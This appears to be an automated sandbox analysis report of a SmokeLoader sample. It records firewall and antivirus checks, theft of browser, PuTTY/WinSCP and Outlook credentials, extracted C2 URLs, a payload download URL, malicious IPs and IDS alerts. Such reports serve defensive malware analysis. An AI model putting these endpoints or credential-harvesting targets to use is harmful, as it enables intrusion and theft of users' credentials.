Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: GetLocaleInfoA,		34_2_00408EA0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\354F.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

Code function: 0_2_00418C80 InterlockedCompareExchange,SetFocus,ReadConsoleA,FindAtomW,SearchPathA,GetConsoleMode,SearchPathW,GetDefaultCommConfigA,CopyFileExA,CreatePipe,GetEnvironmentStringsW,WriteConsoleOutputA,GetModuleFileNameW,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmA,WaitForSingleObject,SetCommMask,GetUserObjectInformationW,GetConsoleAliasesLengthA,GetComputerNameW,GetConsoleAliasExesLengthW,GetBinaryType,PurgeComm,LoadLibraryA,MoveFileW,InterlockedCompareExchange,

0_2_00418C80

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 11_2_00C32198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,

11_2_00C32198

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh firewall show state

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh firewall show state

AV process strings found (often used to terminate AV products)

Source: 354F.exe, 00000009.00000002.3874615260.000001B605CAC000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000003.2543198734.000001B605D13000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000003.2543460011.000001B605D1A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7144, type: MEMORYSTR
Source: Yara match	File source: 7.2.4470.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.4470.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.fihcrfb.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.6c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.4470.exe.2170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2301467371.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2015538177.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7144, type: MEMORYSTR
Source: Yara match	File source: 7.2.4470.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.4470.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.fihcrfb.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.6c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.4470.exe.2170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2301467371.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2015538177.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
109.121.204.14	unknown	Bulgaria	21415	INTERNETGROUP-AS-BGBulgariaBG	true
187.228.112.175	nwgrus.ru	Mexico	8151	UninetSAdeCVMX	true
23.145.40.164	unknown	Reserved	22631	SURFAIRWIRELESS-IN-01US	true
23.145.40.162	calvinandhalls.com	Reserved	22631	SURFAIRWIRELESS-IN-01US	true

Contacted Domains

Name	IP	Active
calvinandhalls.com	23.145.40.162	true
nwgrus.ru	187.228.112.175	true

Contacted URLs

Name	Malicious	Reputation
https://23.145.40.164/ksa9104.exe	true	unknown
http://unicea.ws/tmp/index.php	true	unknown
http://nwgrus.ru/tmp/index.php	true	unknown
https://calvinandhalls.com/search.php	true	unknown
http://tech-servers.in.net/tmp/index.php	true	unknown

AV Detection

Found malware configuration

Source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\hehcrfb

ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: OCYe9qcxiM.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\fihcrfb	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\hehcrfb	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: OCYe9qcxiM.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B636F0 CryptExportKey,CryptExportKey,	9_2_00007FF780B636F0
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B63220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,	9_2_00007FF780B63220
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C33098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,	11_2_00C33098
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C33717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,	11_2_00C33717
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C33E04 RtlCompareMemory,CryptUnprotectData,	11_2_00C33E04
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C311E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,	11_2_00C311E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C31198 CryptBinaryToStringA,CryptBinaryToStringA,	11_2_00C31198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C3123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,	11_2_00C3123B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C31FCE CryptUnprotectData,RtlMoveMemory,	11_2_00C31FCE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C22404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	14_2_00C22404
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C2245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	14_2_00C2245E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C2263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	14_2_00C2263E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_00AD25A4 CryptBinaryToStringA,CryptBinaryToStringA,	16_2_00AD25A4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_00AD2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	16_2_00AD2799

Uses 32bit PE files

Source: OCYe9qcxiM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49763 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6FB34 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,	9_2_00007FF780B6FB34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C32B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	11_2_00C32B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C31D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	11_2_00C31D4A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C33ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	11_2_00C33ED9
Source: C:\Windows\explorer.exe	Code function: 13_2_00D330A8 FindFirstFileW,FindNextFileW,FindClose,	13_2_00D330A8

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49711 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49706 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49708 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49714 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49707 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49712 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49713 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49709 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49710 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49721 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49719 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49716 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49734 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49731 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49717 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49715 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49735 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49722 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49728 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49730 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49720 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49733 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49718 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49729 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49723 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49724 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49737 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49751 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49753 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49754 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49732 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49756 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49760 -> 109.121.204.14:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49755 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49752 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49758 -> 109.121.204.14:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49725 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49736 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49762 -> 109.121.204.14:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49738 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49738 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49739 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49740 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49741 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49749 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49763 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49739 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49740 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49747 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49763 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49744 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49749 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49746 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49741 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49759 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49747 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49759 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49757 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49757 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49748 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49748 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49743 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49744 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49750 -> 23.145.40.162:443
